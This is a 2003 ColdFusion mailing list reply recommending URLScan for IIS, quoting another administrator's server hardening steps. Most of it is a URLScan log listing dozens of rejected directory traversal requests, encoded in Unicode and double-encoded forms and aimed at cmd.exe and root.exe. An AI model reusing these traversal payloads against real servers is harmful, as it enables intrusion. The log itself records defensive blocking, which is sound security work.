I have done everything you have done, plus installed URLScan - no problems for over three years now.
here is part of a log file that URLScan generates: IP 216.15.81.111 traces to OrgName: RCN Corporation OrgID: RCN Address: 105 Carnegie Center City: Princeton StateProv: NJ PostalCode: 08540 Country: US [05-27-2003 - 13:21:46] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/MSADC/root.exe' [05-27-2003 - 13:21:48] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe' [05-27-2003 - 13:21:49] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe' [05-27-2003 - 13:21:50] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe' [05-27-2003 - 13:21:55] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe' [05-27-2003 - 13:21:59] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe' [05-27-2003 - 13:22:00] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe' [05-27-2003 - 13:22:02] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe' [05-27-2003 - 13:22:03] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe' [05-27-2003 - 13:22:05] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe' [05-27-2003 - 13:22:06] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cm d.exe' [05-27-2003 - 13:22:07] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe' [05-27-2003 - 13:22:09] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/s ystem32/cmd.exe' [05-27-2003 - 13:22:13] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe' [05-27-2003 - 13:22:14] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe' [05-27-2003 - 13:22:16] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe ' [05-27-2003 - 13:22:20] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe' [05-27-2003 - 13:22:22] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe' [05-27-2003 - 13:22:23] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe ' [05-27-2003 - 13:22:25] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe ' [05-27-2003 - 13:22:26] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.ex e' [05-27-2003 - 13:22:27] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/c/winnt/system32/cmd.exe' [05-27-2003 - 13:22:29] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe' [05-27-2003 - 13:22:33] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe' [05-27-2003 - 13:22:34] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/d/winnt/system32/cmd.exe' [05-27-2003 - 13:22:39] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe ' [05-27-2003 - 13:22:46] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/msaDC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe' [05-27-2003 - 13:22:51] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe' [05-27-2003 - 13:22:55] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/msaDC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe' [05-27-2003 - 13:22:57] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/msaDC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe' [05-27-2003 - 13:22:58] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe' [05-27-2003 - 13:22:59] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe' [05-27-2003 - 13:23:01] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe' [05-27-2003 - 13:23:01] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.ex e' [05-27-2003 - 13:23:11] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe' [05-27-2003 - 13:23:13] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe' [05-27-2003 - 13:23:17] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe' [05-27-2003 - 13:23:19] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s ystem32/cmd.exe' [05-27-2003 - 13:23:24] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe' [05-27-2003 - 13:23:25] Client at 216.15.81.111: URL contains '.' in the path. Request will be rejected. Site Instance='1', Raw URL='/msadc/..%c1%af../winnt/system32/cmd.exe' [05-27-2003 - 13:23:38] Client at 216.15.81.111: URL contains high bit character. Request will be rejected. Site Instance='1', Raw URL='/msadc/..%c1%pc../winnt/system32/cmd.exe' [05-27-2003 - 13:23:40] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe' [05-27-2003 - 13:23:42] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/msadc/..%e0%80%af../winnt/system32/cmd.exe' [05-27-2003 - 13:23:48] Client at 216.15.81.111: URL contains high bit character. Request will be rejected. Site Instance='1', Raw URL='/msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe' [05-27-2003 - 13:23:52] Client at 216.15.81.111: URL contains high bit character. Request will be rejected. Site Instance='1', Raw URL='/msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cm d.exe' [05-27-2003 - 13:23:53] Client at 216.15.81.111: URL contains high bit character. Request will be rejected. Site Instance='1', Raw URL='/msadc/..%f0%80%80%af../winnt/system32/cmd.exe' [05-27-2003 - 13:23:55] Client at 216.15.81.111: URL contains high bit character. Request will be rejected. Site Instance='1', Raw URL='/msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/sy stem32/cmd.exe' [05-27-2003 - 13:23:59] Client at 216.15.81.111: URL contains high bit character. Request will be rejected. Site Instance='1', Raw URL='/msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe' [05-27-2003 - 13:24:03] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe' [05-27-2003 - 13:24:05] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe' [05-27-2003 - 13:24:06] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/scripts..%c1%9c../winnt/system32/cmd.exe' [05-27-2003 - 13:24:07] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/scripts/.%252e/.%252e/winnt/system32/cmd.exe' [05-27-2003 - 13:24:17] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%%35c../winnt/system32/cmd.exe' [05-27-2003 - 13:24:19] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%25%35%63../winnt/system32/cmd.exe' [05-27-2003 - 13:24:23] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe' [05-27-2003 - 13:24:30] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%%35%63../winnt/system32/cmd.exe' [05-27-2003 - 13:24:45] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%255c%255c../winnt/system32/cmd.exe' [05-27-2003 - 13:24:47] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%255c..%255cwinnt/system32/cmd.exe' [05-27-2003 - 13:24:48] Client at 216.15.81.111: URL normalization was not complete after one pass. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%255c../winnt/system32/cmd.exe' [05-27-2003 - 13:24:49] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe' [05-27-2003 - 13:24:56] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe' [05-27-2003 - 13:24:59] Client at 216.15.81.111: URL contains high bit character. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%c0%9v../winnt/system32/cmd.exe' [05-27-2003 - 13:25:00] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%c0%af../winnt/system32/cmd.exe' [05-27-2003 - 13:25:01] Client at 216.15.81.111: URL contains high bit character. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%c0%qf../winnt/system32/cmd.exe' [05-27-2003 - 13:25:08] Client at 216.15.81.111: URL contains high bit character. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%c1%8s../winnt/system32/cmd.exe' [05-27-2003 - 13:25:11] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%c1%9c../winnt/system32/cmd.exe' [05-27-2003 - 13:25:12] Client at 216.15.81.111: URL contains high bit character. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%c1%1c../winnt/system32/cmd.exe' [05-27-2003 - 13:25:12] Client at 216.15.81.111: URL contains high bit character. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe' [05-27-2003 - 13:25:15] Client at 216.15.81.111: URL contains '.' in the path. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%c1%af../winnt/system32/cmd.exe' [05-27-2003 - 13:25:16] Client at 216.15.81.111: URL contains high bit character. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%c1%pc../winnt/system32/cmd.exe' [05-27-2003 - 13:25:23] Client at 216.15.81.111: URL contains high bit character. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%f0%80%80%af../winnt/system32/cmd.exe' [05-27-2003 - 13:25:25] Client at 216.15.81.111: URL contains high bit character. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe' [05-27-2003 - 13:25:32] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/scripts/root.exe' [05-27-2003 - 13:25:35] Client at 216.15.81.111: URL contains high bit character. Request will be rejected. Site Instance='1', Raw URL='/msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af.. /winnt/system32/cmd.exe' [05-27-2003 - 13:25:36] Client at 216.15.81.111: URL contains high bit character. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe' [05-27-2003 - 13:25:39] Client at 216.15.81.111: URL contains extension '.exe', which is disallowed. Request will be rejected. Site Instance='1', Raw URL='/scripts/..%e0%80%af../winnt/system32/cmd.exe' ====================================== Stop spam on your domain, use our gateway! For CF hosting solutions http://www.clickdoug.com ISP rated: http://www.forta.com/cf/isp/isp.cfm?isp_id=772 ====================================== If you are not satisfied with my service, my job isn't done! ----- Original Message ----- From: "cfhelp" <[EMAIL PROTECTED]> To: "CF-Community" <[EMAIL PROTECTED]> Sent: Sunday, June 01, 2003 9:33 PM Subject: RE: URLScan | This is why I haven't installed it, everyone is saying something different. | | This is what I do, I welcome any suggestions. | | | Windows 2000 with all the SP's and other "Critical Updates" I do not install | anything that is not needed on a server (Media) | | Create Local Account with Admin Rights | | Install CF | | Change the name of the Scripts directory. | | Stop the default Web Site | | Create a Virtual Directory on another Site for the CFIDE folder, locked down | with NTFS. | | Create 3 folders for websites on a separate (RAID) partition. | | (Not Actual Names) | Websites (CF Tag Restrictions) | WebSiteCF (No Tag Restrictions) | WebSitesSub (Sub Domains) | | | This is just the basics there is plenty to do with SMTP, Custom Tags, IIS | Defaults, FTP, PERL, PHP and so on. It seems to be a pretty easy and strait | forward administration. But I am still being scanned by hackers but from | what I can tell nothing is getting through. | | I am looking for a way to see the request in real-time and am always looking | for a better setup and security. | | | Rick ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Archives: http://www.houseoffusion.com/cf_lists/index.cfm?forumid=5 Subscription: http://www.houseoffusion.com/cf_lists/index.cfm?method=subscribe&forumid=5 Get the mailserver that powers this list at http://www.coolfusion.com Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.5
